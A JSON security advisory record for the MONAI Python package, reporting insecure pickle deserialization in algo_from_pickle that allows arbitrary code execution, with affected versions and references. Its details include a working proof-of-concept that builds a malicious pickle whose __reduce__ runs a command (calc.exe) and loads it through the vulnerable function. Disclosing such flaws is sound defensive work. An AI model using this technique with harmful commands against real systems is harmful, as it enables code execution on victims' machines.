{"id":"GHSA-89gg-p5r5-q6r4","summary":"MONAI: Unsafe functions lead to pickle deserialization rce","details":"### Summary\nThe `algo_from_pickle` function in `monai/auto3dseg/utils.py` causes `pickle.loads(data_bytes)` to be executed, and it does not perform any validation on the input parameters. This ultimately leads to insecure deserialization and can result in code execution vulnerabilities.\n\n### Details\npoc\n```\nimport pickle\nimport subprocess\nclass MaliciousAlgo:\n    def __reduce__(self):\n        return (subprocess.call, (['calc.exe'],))\nmalicious_algo_bytes = pickle.dumps(MaliciousAlgo())\n\nattack_data = {\n    \"algo_bytes\": malicious_algo_bytes,  \n     \n}\nattack_pickle_file = \"attack_algo.pkl\"\nwith open(attack_pickle_file, \"wb\") as f:\n    f.write(pickle.dumps(attack_data))\n\n```\nGenerate the malicious file \"attack_algo.pkl\" through POC.\n\n```\nfrom monai.auto3dseg.utils import algo_from_pickle\n\n\nattack_pickle_file = \"attack_algo.pkl\"\nresult = algo_from_pickle(attack_pickle_file)\n```\nUltimately, it will trigger pickle.load through a file to identify the command execution.\n\n\u003cimg width=\"909\" height=\"534\" alt=\"image\" src=\"https://github.com/user-attachments/assets/071adbb7-3e40-4651-be48-abd2ce32470f\" /\u003e\n\nCauses of the vulnerability:\n```\ndef algo_from_pickle(pkl_filename: str, template_path: PathLike | None = None, **kwargs: Any) -\u003e Any:\n\n    with open(pkl_filename, \"rb\") as f_pi:\n            data_bytes = f_pi.read()\n        data = pickle.loads(data_bytes)\n\n```\n\n\n\n### Impact\nArbitrary code execution\n\nRepair suggestions\nVerify the data source and content before deserializing, or use a safe deserialization method","aliases":["CVE-2026-100846","PYSEC-2026-4021"],"modified":"2026-10-01T09:26:04.073836298Z","published":"2026-04-07T20:17:21Z","database_specific":{"cwe_ids":["CWE-502"],"severity":"HIGH","github_reviewed":true,"github_reviewed_at":"2026-04-07T20:17:21Z","nvd_published_at":null},"references":[{"type":"WEB","url":"https://github.com/Project-MONAI/MONAI/security/advisories/GHSA-89gg-p5r5-q6r4"},{"type":"WEB","url":"https://github.com/Project-MONAI/MONAI/issues/8874#issuecomment-4752023161"},{"type":"WEB","url":"https://github.com/Project-MONAI/MONAI/commit/9078a72f3992e49bd4560db510be9ec4ccf972cc"},{"type":"PACKAGE","url":"https://github.com/Project-MONAI/MONAI"},{"type":"WEB","url":"https://github.com/Project-MONAI/MONAI/releases/tag/1.6.0"}],"affected":[{"package":{"name":"monai","ecosystem":"PyPI","purl":"pkg:pypi/monai"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.6.0"}]}],"versions":["0.0.1","0.1.0","0.2.0","0.3.0","0.4.0","0.5.0","0.5.1","0.5.2","0.5.3","0.6.0","0.7.0","0.8.0","0.8.1","0.9.0","0.9.1","1.0.0","1.0.1","1.1.0","1.2.0","1.3.0","1.3.1","1.3.2","1.3.2rc1","1.3.3rc1","1.4.0","1.4.0rc1","1.4.0rc10","1.4.0rc11","1.4.0rc12","1.4.0rc2","1.4.0rc3","1.4.0rc4","1.4.0rc5","1.4.0rc6","1.4.0rc7","1.4.0rc8","1.4.0rc9","1.4.1rc1","1.5.0","1.5.0rc1","1.5.1","1.5.2","1.5.2rc1"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/04/GHSA-89gg-p5r5-q6r4/GHSA-89gg-p5r5-q6r4.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H"}]}